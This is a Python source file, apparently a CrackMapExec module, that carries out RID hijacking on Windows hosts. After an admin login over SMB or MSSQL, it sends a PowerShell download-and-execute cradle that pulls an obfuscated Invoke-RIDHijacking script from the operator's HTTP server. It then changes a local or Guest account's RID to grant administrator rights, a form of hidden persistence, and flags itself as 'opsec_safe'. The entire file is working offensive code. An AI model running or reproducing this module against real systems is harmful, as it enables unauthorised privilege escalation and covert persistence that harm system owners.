from cme.helpers.powershell import * from cme.helpers.logger import write_log, highlight from datetime import datetime from io import StringIO import re class CMEModule: ''' Executes Invoke-RIDhijacking.ps1 allowing to set desired privileges to an existent local account by modifying the Relative Identifier value copy used to create the access token Module by Sebastian Castro @r4wd3r ''' name = 'rid_hijack' description = "Executes the RID hijacking persistence hook." supported_protocols = ['smb', 'mssql'] opsec_safe = True multiple_hosts = True def options(self, context, module_options): ''' RID RID to set to the specified account. Default 500. USER User to set the defined RID. USEGUEST Boolean. Set the defined RID to the Guest account. PASSWORD Password to set to the defined account. ENABLE Boolean. Enable the defined account. ''' self.rid = 500 self.user = None self.password = None self.useguest = False self.enable = False if 'RID' in module_options: self.rid = int(module_options['RID']) if 'USER' in module_options: self.user = str(module_options['USER']) if 'PASSWORD' in module_options: self.password = str(module_options['PASSWORD']) if 'USEGUEST' in module_options: self.useguest = True if 'ENABLE' in module_options: self.enable = True self.ps_script1 = obfs_ps_script('RID-Hijacking/Invoke-RIDHijacking.ps1') def on_admin_login(self, context, connection): command = 'Invoke-RIDHijacking' command += ' -RID ' + str(self.rid) if self.user: command += ' -User ' + self.user if self.password: command += ' -Password ' + self.password if self.useguest: command += ' -UseGuest ' if self.enable: command += ' -Enable ' launcher = gen_ps_iex_cradle(context, 'Invoke-RIDHijacking.ps1', command) connection.ps_execute(launcher) context.log.success('Executed launcher') def on_request(self, context, request): if 'Invoke-RIDHijacking.ps1' == request.path[1:]: request.send_response(200) request.end_headers() request.wfile.write(self.ps_script1) else: request.send_response(404) request.end_headers() def on_response(self, context, response): response.send_response(200) response.end_headers() length = int(response.headers.getheader('content-length')) data = response.stop_tracking_host() if len(data): context.log.success('Invoke-RIDHijacking executed successfully') buf = StringIO(data.strip()).readlines() for line in buf: output = filter(None, re.split(r'(?:\s*\[.\]\s)', line.strip())) for o in output: context.log.highlight(o)